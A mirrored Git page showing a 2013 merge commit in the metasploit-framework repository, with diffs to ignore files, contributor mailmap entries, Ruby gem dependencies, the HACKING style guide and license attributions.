infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'upstream/master' into powershell_auto_arch 

Conflicts:
	lib/msf/util/exe.rb
bug/bundler_fix
Meatballs 2013-12-16 09:07:08 +00:00
parent adb6e30751 3dec7f61a5
commit 7cc99d76ad
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
3173 changed files with 76212 additions and 51130 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
.gitignore vendored
View File

@ -3,10 +3,7 @@
.idea .idea
# Sublime Text project directory (not created by ST by default) # Sublime Text project directory (not created by ST by default)
.sublime-project .sublime-project
# Portable ruby version files for rvm # RVM control file, keep this to avoid backdooring Metasploit
.ruby-gemset
.ruby-version
# RVM control file
.rvmrc .rvmrc
# YARD cache directory # YARD cache directory
.yardoc .yardoc
@ -16,7 +13,7 @@
config/database.yml config/database.yml
# simplecov coverage data # simplecov coverage data
coverage coverage
data/meterpreter/ext_server_pivot.dll data/meterpreter/ext_server_pivot.x86.dll
data/meterpreter/ext_server_pivot.x64.dll data/meterpreter/ext_server_pivot.x64.dll
doc/ doc/
external/source/meterpreter/java/bin external/source/meterpreter/java/bin
@ -44,3 +41,13 @@ tags
*~ *~
# Ignore backups of retabbed files # Ignore backups of retabbed files
*.notab *.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

3
.gitmodules vendored Normal file
View File

@ -0,0 +1,3 @@
[submodule "external/source/ReflectiveDLLInjection"]
path = external/source/ReflectiveDLLInjection
url = https://github.com/rapid7/ReflectiveDLLInjection.git

41
.mailmap
View File

@ -1,50 +1,54 @@
bperry-r7 <bperry-r7@github> Brandon Perry <bperry.volatile@gmail.com>
bperry-r7 <bperry-r7@github> Brandon Perry <bperry@bperry-rapid7.(none)>
bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com> bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com> dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com> ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com> hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net> hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com> joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com> jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com> limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com> shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com> tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com> todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com> todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com> wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
# Above this line are current Rapid7 employees Below this paragraph are # Above this line are current Rapid7 employees. Below this paragraph are
# volunteers, former employees, and potential Rapid7 employees who, at # volunteers, former employees, and potential Rapid7 employees who, at
# one time or another, had some largeish number of commits landed on # one time or another, had some largeish number of commits landed on
# rapid7/metasploit-framework master branch. This should be refreshed # rapid7/metasploit-framework master branch. This should be refreshed
# periodically. If you're on this list and would like to not be, just # periodically. If you're on this list and would like to not be, just
# let todb@metasploit.com know. # let todb@metasploit.com know.
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry.volatile@gmail.com>
Brandon Perry <brandonprry@github> Brandon Perry <bperry@bperry-rapid7.(none)>
Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com> Brian Wallace <bwall@github> (B)rian (Wall)ace <nightstrike9809@gmail.com>
Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com> Brian Wallace <bwall@github> Brian Wallace <bwall@openbwall.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
Chao-mu <Chao-Mu@github> Chao Mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc> ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com> corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk> corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
bannedit <bannedit@github> David Rude <bannedit0@gmail.com>
ceballosm <ceballosm@github> Mario Ceballos <mc@metasploit.com>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com> darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com> efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <> efraintorres <efraintorres@github> et <>
fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON) fab <fab@???> fab <> # fab at revhosts.net (Fabrice MOURRON)
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com> FireFart <FireFart@github> Christian Mehlmauer <firefart@gmail.com>
h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com> h0ng10 <h0ng10@github> h0ng10 <hansmartin.muench@googlemail.com>
h0ng10 <h0ng10@github> Hans-Martin Münch <hansmartin.muench@googlemail.com>
jcran <jcran@github> Jonathan Cran <jcran@0x0e.org> jcran <jcran@github> Jonathan Cran <jcran@0x0e.org>
jcran <jcran@github> Jonathan Cran <jcran@rapid7.com> jcran <jcran@github> Jonathan Cran <jcran@rapid7.com>
jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org> jduck <jduck@github> Joshua Drake <github.jdrake@qoop.org>
@ -56,11 +60,16 @@ kris <kris@???> kris <>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de> m-1-k-3 <m-1-k-3@github> m-1-k-3 <github@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de> m-1-k-3 <m-1-k-3@github> m-1-k-3 <m1k3@s3cur1ty.de>
m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com> m-1-k-3 <m-1-k-3@github> m-1-k-3 <michael.messner@integralis.com>
Meatballs1 <Meatballs1@github> Ben Campbell <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs <eat_meatballs@hotmail.co.uk>
Meatballs1 <Meatballs1@github> Meatballs1 <eat_meatballs@hotmail.co.uk>
mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com> mubix <mubix@github> Rob Fuller <jd.mubix@gmail.com>
nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net> nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk> nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com> nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com> ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local> r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com> r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane

2
.rspec
View File

@ -1,2 +1,2 @@
--color --color
--format documentation --format Fivemat

1
.ruby-gemset Normal file
View File

@ -0,0 +1 @@
metasploit-framework

1
.ruby-version Normal file
View File

@ -0,0 +1 @@
1.9.3-p484

2
.travis.yml
View File

@ -15,4 +15,4 @@ notifications:
irc: "irc.freenode.org#msfnotify" irc: "irc.freenode.org#msfnotify"
git: git:
depth: 1 depth: 5

11
Gemfile
View File

@ -1,4 +1,4 @@
source 'http://rubygems.org' source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern # Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0' gem 'activesupport', '>= 3.0.0'
@ -11,7 +11,7 @@ gem 'nokogiri'
# Needed by anemone crawler # Needed by anemone crawler
gem 'robots' gem 'robots'
# Needed by db.rb and Msf::Exploit::Capture # Needed by db.rb and Msf::Exploit::Capture
gem 'packetfu', '1.1.8' gem 'packetfu', '1.1.9'
group :db do group :db do
# Needed for Msf::DbManager # Needed for Msf::DbManager
@ -40,8 +40,10 @@ group :development, :test do
# Version 4.1.0 or newer is needed to support generate calls without the # Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax. # 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0' gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks # running documentation generation tasks and rspec tasks
gem 'rake' gem 'rake', '>= 10.0.0'
end end
group :test do group :test do
@ -51,11 +53,10 @@ group :test do
gem 'database_cleaner' gem 'database_cleaner'
# testing framework # testing framework
gem 'rspec', '>= 2.12' gem 'rspec', '>= 2.12'
# add matchers from shoulda, such as query_the_database, which is useful for
# testing that the Msf::DBManager activation is respected.
gem 'shoulda-matchers' gem 'shoulda-matchers'
# code coverage for tests # code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files. # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs # Manipulate Time.now in specs
gem 'timecop' gem 'timecop'

70
Gemfile.lock
View File

@ -1,62 +1,59 @@
GEM GEM
remote: http://rubygems.org/ remote: https://rubygems.org/
specs: specs:
activemodel (3.2.13) activemodel (3.2.14)
activesupport (= 3.2.13) activesupport (= 3.2.14)
builder (~> 3.0.0) builder (~> 3.0.0)
activerecord (3.2.13) activerecord (3.2.14)
activemodel (= 3.2.13) activemodel (= 3.2.14)
activesupport (= 3.2.13) activesupport (= 3.2.14)
arel (~> 3.0.2) arel (~> 3.0.2)
tzinfo (~> 0.3.29) tzinfo (~> 0.3.29)
activesupport (3.2.13) activesupport (3.2.14)
i18n (= 0.6.1) i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0) multi_json (~> 1.0)
arel (3.0.2) arel (3.0.2)
bourne (1.4.0)
mocha (~> 0.13.2)
builder (3.0.4) builder (3.0.4)
database_cleaner (0.9.1) database_cleaner (1.1.1)
diff-lcs (1.2.2) diff-lcs (1.2.4)
factory_girl (4.2.0) factory_girl (4.2.0)
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
i18n (0.6.1) fivemat (1.2.1)
json (1.7.7) i18n (0.6.5)
metaclass (0.0.1) json (1.8.0)
metasploit_data_models (0.16.6) metasploit_data_models (0.16.6)
activerecord (>= 3.2.13) activerecord (>= 3.2.13)
activesupport activesupport
pg pg
mocha (0.13.3) mini_portile (0.5.1)
metaclass (~> 0.0.1) msgpack (0.5.5)
msgpack (0.5.4)
multi_json (1.0.4) multi_json (1.0.4)
network_interface (0.0.1) network_interface (0.0.1)
nokogiri (1.5.9) nokogiri (1.6.0)
packetfu (1.1.8) mini_portile (~> 0.5.0)
packetfu (1.1.9)
pcaprub (0.11.3) pcaprub (0.11.3)
pg (0.15.1) pg (0.16.0)
rake (10.0.4) rake (10.1.0)
redcarpet (2.2.2) redcarpet (3.0.0)
robots (0.10.1) robots (0.10.1)
rspec (2.13.0) rspec (2.14.1)
rspec-core (~> 2.13.0) rspec-core (~> 2.14.0)
rspec-expectations (~> 2.13.0) rspec-expectations (~> 2.14.0)
rspec-mocks (~> 2.13.0) rspec-mocks (~> 2.14.0)
rspec-core (2.13.1) rspec-core (2.14.5)
rspec-expectations (2.13.0) rspec-expectations (2.14.2)
diff-lcs (>= 1.1.3, < 2.0) diff-lcs (>= 1.1.3, < 2.0)
rspec-mocks (2.13.0) rspec-mocks (2.14.3)
shoulda-matchers (1.5.2) shoulda-matchers (2.3.0)
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
bourne (~> 1.3)
simplecov (0.5.4) simplecov (0.5.4)
multi_json (~> 1.0.3) multi_json (~> 1.0.3)
simplecov-html (~> 0.5.3) simplecov-html (~> 0.5.3)
simplecov-html (0.5.3) simplecov-html (0.5.3)
timecop (0.6.1) timecop (0.6.3)
tzinfo (0.3.37) tzinfo (0.3.37)
yard (0.8.5.2) yard (0.8.7)
PLATFORMS PLATFORMS
ruby ruby
@ -66,15 +63,16 @@ DEPENDENCIES
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
database_cleaner database_cleaner
factory_girl (>= 4.1.0) factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json json
metasploit_data_models (~> 0.16.6) metasploit_data_models (~> 0.16.6)
msgpack msgpack
network_interface (~> 0.0.1) network_interface (~> 0.0.1)
nokogiri nokogiri
packetfu (= 1.1.8) packetfu (= 1.1.9)
pcaprub pcaprub
pg (>= 0.11) pg (>= 0.11)
rake rake (>= 10.0.0)
redcarpet redcarpet
robots robots
rspec (>= 2.12) rspec (>= 2.12)

32
HACKING
View File

@ -9,8 +9,8 @@ Code Style
In order to maintain consistency and readability, we ask that you In order to maintain consistency and readability, we ask that you
adhere to the following style guidelines: adhere to the following style guidelines:
- Hard tabs, not spaces - Standard Ruby two-space soft tabs, not hard tabs.
- Try to keep your lines under 100 columns (assuming four-space tabs) - Try to keep your lines under 100 columns (assuming two-space tabs)
- do; end instead of {} for a block - do; end instead of {} for a block
- Always use str[0,1] instead of str[0] - Always use str[0,1] instead of str[0]
(This avoids a known ruby 1.8/1.9 incompatibility.) (This avoids a known ruby 1.8/1.9 incompatibility.)
@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an need user input, you can either register an option or expose an
interactive session type specific for the type of exploit. interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with 3. Always use Rex sockets, not ruby sockets. This includes
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in the creation of ruby sockets and won't know how to clean them up in
@ -54,22 +48,23 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example. Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or 4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8. that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in 5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom: ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1] str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like which always returns a String. If you need the ASCII byte, unpack it like
so: so:
str[idx,1].unpack("C")[0] tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings. 6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation: following table approximates the underlying implementation:
Ruby Pseudo-C Ruby Pseudo-C
----------- ---------------- ----------- ----------------
a = b + c a = malloc(b.len+c.len+1); a = b + c a = malloc(b.len+c.len+1);
@ -80,22 +75,21 @@ following table approximates the underlying implementation:
a << c a = realloc(a, a.len+c.len+1); a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len); memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0'; a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify. must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's 7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html> excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas. for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins, 8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables use @@class_variables, but most modules should use @instance variables
to store information between methods. to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to 9. Don't craft your XML document raw or by using Nokogiri, the current
warning messages when the module is reloaded. Try to keep constants preferred way is REXML.
inside libraries and mixins instead.
Creating New Modules Creating New Modules
==================== ====================

347
LICENSE
View File

@ -12,7 +12,7 @@ License: BSD-3-clause
# #
# This license does not apply to third-party components detailed below. # This license does not apply to third-party components detailed below.
# #
# Last updated: 2013-Mar-25 # Last updated: 2013-Nov-04
# #
Files: data/john/* Files: data/john/*
@ -166,230 +166,6 @@ Files: lib/fastlib.rb
Copyright: 2011, Rapid7 Inc. Copyright: 2011, Rapid7 Inc.
License: Ruby License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/eventmachine-*/*
Copyright: 2006-2007, Francis Cianfrocca
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/json-*/*
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/msgpack-*/*
Copyright: Austin Ziegler
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/nokogiri-*/*
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: lib/gemcache/ruby/1.9.1/arch/*/pg-*/*
Copyright: 1997-2012 by the authors
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/thin-*/*
Copyright: Marc-Andre Cournoyer
License: Ruby
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-api-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/win32-service-*/*
Copyright: 2003-2011, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-api-*/*
Copyright: 2007-2012, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/arch/*/windows-pr-*/*
Copyright: 2006-2010, Daniel J. Berger
License: Artistic
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: 2006-2011, murphy (Kornelius Kalnback) <murphy rubychan de>
License: LGPL-2.1
Files: lib/gemcache/ruby/1.9.1/gems/actionmailer-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/actionpack-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activemodel-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activerecord-*/*
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activeresource-*/*
Copyright: 2006-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/activesupport-*/*
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/acts_as_list-*/*
Copyright: 2007 David Heinemeir Hansson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/arel-*/*
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/authlogic-*/*
Copyright: 2011 Ben Johnson of Binary Logic
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/builder-*/*
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/carrierwave-*/*
Copyright: 2008-2012 Jonas Nicklas
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/chunky_png-*/*
Copyright: 2010 Willem van Bergen
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/coderay-*/*
Copyright: Rob Aldred
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/daemons-*/*
Copyright: 2005-2012 Thomas Uehlinger
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/diff-lcs-*/*
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/erubis-*/*
Copyright: 2006-2011 kuwata-lab.com all rights reserved
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/formtastic-*/*
Copyright: 2008-2010
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/fssm-*/*
Copyright: 2011 Travis Tilley
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/hike-*/*
Copyright: 2011 Sam Stephenson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/i18n-*/*
Copyright: 2008 The Ruby I18n team
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/ice_cube-*/*
Copyright: 2010-2012 John Crepezzi
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/journey-*/*
Copyright: 2011 Aaron Patternson
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/jquery-rails-*/*
Copyright: 2010 Andre Arko
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/liquid-*/*
Copyright: 2005, 2006 Tobias Luetke
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/mail-*/*
Copyright: 2009, 2010, 2011, 2012 Mikel Lindsaar
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/metasploit_data_modules-*/*
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/method_source-*/*
Copyright: 2011 John Mair (banisterfiend)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/multi_json-*/*
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/polyglot-*/*
Copyright: 2007 Clifford Heath
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/prototype_legacy_helper-*/*
Copyright: No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-*/*
Copyright: 2007-2010 Christian Neukirchen <purl.org/net/chneukirchen>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
Copyright: 2010 Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
Copyright: No copyright statement provided
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
Copyright: 2012 Lee Jarvis
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
Copyright: 2009 Tim Harper
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
Copyright: 2011 Sam Stephenson, Joshua Peek
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
Copyright: 2006-2012 Aaron Pfeifer
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
Copyright: 2008 Yehuda Katz
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
Copyright: 2007 Nathan Sobo
License: MIT
Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
Copyright: 2005-2006 Philip Ross
License: MIT
Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
Copyright: 2006-2010 Yoann GUILLOT Copyright: 2006-2010 Yoann GUILLOT
License: LGPL-2.1 License: LGPL-2.1
@ -454,6 +230,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com> Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
License: BSD-3-clause License: BSD-3-clause
#
# Gems
#
Files: activemodel
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activerecord
Copyright: 2004-2011 David Heinemeier Hansson
License: MIT
Files: activesupport
Copyright: 2005-2011 David Heinemeier Hansson
License: MIT
Files: arel
Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
License: MIT
Files: builder
Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
License: MIT
Files: database_cleaner
Copyright: 2009 Ben Mabey
License: MIT
Files: diff-lcs
Copyright: 2004-2011 Austin Ziegler
License: MIT
Files: factory_girl
Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
License: MIT
